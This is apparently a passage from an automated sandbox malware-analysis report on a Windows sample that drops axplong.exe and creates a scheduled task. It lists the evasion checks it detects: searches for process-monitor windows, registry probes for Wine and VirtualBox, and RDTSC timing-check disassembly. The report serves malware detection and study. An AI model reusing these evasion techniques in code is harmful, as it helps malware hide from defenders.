                    Source: axplong.exe.0.drStatic PE information: section name: .idata
                    Source: axplong.exe.0.drStatic PE information: section name:
                    Source: axplong.exe.0.drStatic PE information: section name: wfabfqoe
                    Source: axplong.exe.0.drStatic PE information: section name: qxvdwait
                    Source: axplong.exe.0.drStatic PE information: section name: .taggant
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 7_2_006BD84C push ecx; ret 7_2_006BD85F
                    Source: EXyAlLKIck.exeStatic PE information: section name: entropy: 7.982589984423413
                    Source: EXyAlLKIck.exeStatic PE information: section name: wfabfqoe entropy: 7.954564972616457
                    Source: axplong.exe.0.drStatic PE information: section name: entropy: 7.982589984423413
                    Source: axplong.exe.0.drStatic PE information: section name: wfabfqoe entropy: 7.954564972616457
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeFile created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeJump to dropped file

                    Boot Survival

                    barindex
                    Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonclassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonclassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeFile created: C:\Windows\Tasks\axplong.jobJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Tries to detect sandboxes / dynamic malware analysis system (registry check)
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Tries to detect virtualization through RDTSC time measurements
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 935C73 second address: 935C79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 92B7E4 second address: 92B7EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 92B7EA second address: 92B80A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE5B8D9CB62h 0x0000000d jc 00007FE5B8D9CB56h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 92B80A second address: 92B80E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 92B80E second address: 92B81A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FE5B8D9CB56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 935045 second address: 935064 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jmp 00007FE5B8F4A752h 0x0000000b js 00007FE5B8F4A746h 0x00000011 pop edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 935064 second address: 935078 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE5B8D9CB5Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 93537A second address: 93538A instructions: 0x00000000 rdtsc 0x00000002 jp 00007FE5B8F4A746h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 93538A second address: 935393 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 935393 second address: 9353AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007FE5B8F4A746h 0x00000014 jo 00007FE5B8F4A746h 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9353AD second address: 9353C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8D9CB65h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 93551C second address: 93553B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FE5B8F4A746h 0x0000000a pop ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007FE5B8F4A74Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 93553B second address: 93555C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FE5B8D9CB68h 0x0000000d pop ebx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 937978 second address: 937982 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FE5B8F4A746h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 937982 second address: 937986 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 937A07 second address: 937A9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 nop 0x00000008 mov edx, eax 0x0000000a push 00000000h 0x0000000c mov edi, ebx 0x0000000e push 30A59EDFh 0x00000013 jmp 00007FE5B8F4A754h 0x00000018 xor dword ptr [esp], 30A59E5Fh 0x0000001f adc dx, 377Ah 0x00000024 push 00000003h 0x00000026 push 00000000h 0x00000028 push eax 0x00000029 call 00007FE5B8F4A748h 0x0000002e pop eax 0x0000002f mov dword ptr [esp+04h], eax 0x00000033 add dword ptr [esp+04h], 0000001Ch 0x0000003b inc eax 0x0000003c push eax 0x0000003d ret 0x0000003e pop eax 0x0000003f ret 0x00000040 push 00000000h 0x00000042 push 00000000h 0x00000044 push esi 0x00000045 call 00007FE5B8F4A748h 0x0000004a pop esi 0x0000004b mov dword ptr [esp+04h], esi 0x0000004f add dword ptr [esp+04h], 00000019h 0x00000057 inc esi 0x00000058 push esi 0x00000059 ret 0x0000005a pop esi 0x0000005b ret 0x0000005c push 00000003h 0x0000005e mov di, 44B1h 0x00000062 push 8CDCC9A9h 0x00000067 pushad 0x00000068 jnp 00007FE5B8F4A748h 0x0000006e push eax 0x0000006f push edx 0x00000070 je 00007FE5B8F4A746h 0x00000076 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 937A9F second address: 937AF2 instructions: 0x00000000 rdtsc 0x00000002 je 00007FE5B8D9CB56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b add dword ptr [esp], 33233657h 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007FE5B8D9CB58h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 0000001Ah 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c mov dword ptr [ebp+122D3603h], ecx 0x00000032 lea ebx, dword ptr [ebp+1244C89Fh] 0x00000038 mov si, 1805h 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f push ebx 0x00000040 jmp 00007FE5B8D9CB5Ah 0x00000045 pop ebx 0x00000046 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 937C67 second address: 937C83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE5B8F4A758h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 937C83 second address: 937CAE instructions: 0x00000000 rdtsc 0x00000002 jg 00007FE5B8D9CB56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e jmp 00007FE5B8D9CB5Fh 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jnl 00007FE5B8D9CB56h 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 937CAE second address: 937CB4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 957155 second address: 95715B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 95715B second address: 95717D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A754h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c jo 00007FE5B8F4A746h 0x00000012 pop ecx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 957473 second address: 957479 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 957722 second address: 95773E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE5B8F4A758h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 958293 second address: 958299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 958299 second address: 9582B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FE5B8F4A756h 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9582B6 second address: 9582CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007FE5B8D9CB56h 0x0000000e jnp 00007FE5B8D9CB56h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9582CA second address: 9582D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 94C57B second address: 94C581 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 921734 second address: 921749 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A751h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 921749 second address: 92174F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 92174F second address: 921755 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 921755 second address: 921759 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 958C46 second address: 958C69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FE5B8F4A74Ch 0x0000000c jmp 00007FE5B8F4A74Dh 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 958C69 second address: 958C6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 958C6D second address: 958C71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 924C72 second address: 924C78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 924C78 second address: 924C8C instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE5B8F4A746h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007FE5B8F4A746h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 924C8C second address: 924C90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 95E5D1 second address: 95E5D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 96555F second address: 965563 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 965563 second address: 96557D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE5B8F4A750h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 96557D second address: 965583 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 965583 second address: 965589 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 965589 second address: 96558F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 96558F second address: 965595 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 964C6D second address: 964C85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE5B8D9CB60h 0x00000009 popad 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 964E1E second address: 964E24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9675A2 second address: 9675C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE5B8D9CB65h 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9675C2 second address: 9675F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A74Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007FE5B8F4A74Ah 0x00000013 mov eax, dword ptr [eax] 0x00000015 push eax 0x00000016 push edx 0x00000017 push esi 0x00000018 jmp 00007FE5B8F4A74Dh 0x0000001d pop esi 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9675F6 second address: 96761A instructions: 0x00000000 rdtsc 0x00000002 jno 00007FE5B8D9CB5Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FE5B8D9CB5Ch 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 96761A second address: 967620 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 967620 second address: 967626 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 967A18 second address: 967A1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 967AF7 second address: 967B02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 967D3C second address: 967D40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 968230 second address: 968234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 968234 second address: 968242 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE5B8F4A746h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 968242 second address: 968246 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 968246 second address: 96824A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 96824A second address: 968257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 968825 second address: 968884 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jnl 00007FE5B8F4A762h 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007FE5B8F4A748h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000015h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 mov esi, edi 0x0000002b xchg eax, ebx 0x0000002c jmp 00007FE5B8F4A74Dh 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 pushad 0x00000036 popad 0x00000037 pop eax 0x00000038 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 968D25 second address: 968D30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FE5B8D9CB56h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 968D30 second address: 968DB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a jmp 00007FE5B8F4A74Bh 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007FE5B8F4A748h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 00000015h 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b push 00000000h 0x0000002d jp 00007FE5B8F4A751h 0x00000033 pushad 0x00000034 jo 00007FE5B8F4A749h 0x0000003a movzx eax, dx 0x0000003d jbe 00007FE5B8F4A74Ch 0x00000043 mov dword ptr [ebp+122D1EB1h], edx 0x00000049 popad 0x0000004a xchg eax, ebx 0x0000004b jmp 00007FE5B8F4A756h 0x00000050 push eax 0x00000051 js 00007FE5B8F4A759h 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a pop eax 0x0000005b rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 969765 second address: 96976A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 96A961 second address: 96A97C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE5B8F4A757h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 96AA35 second address: 96AA3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 96AA3B second address: 96AA41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 96AA41 second address: 96AA45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
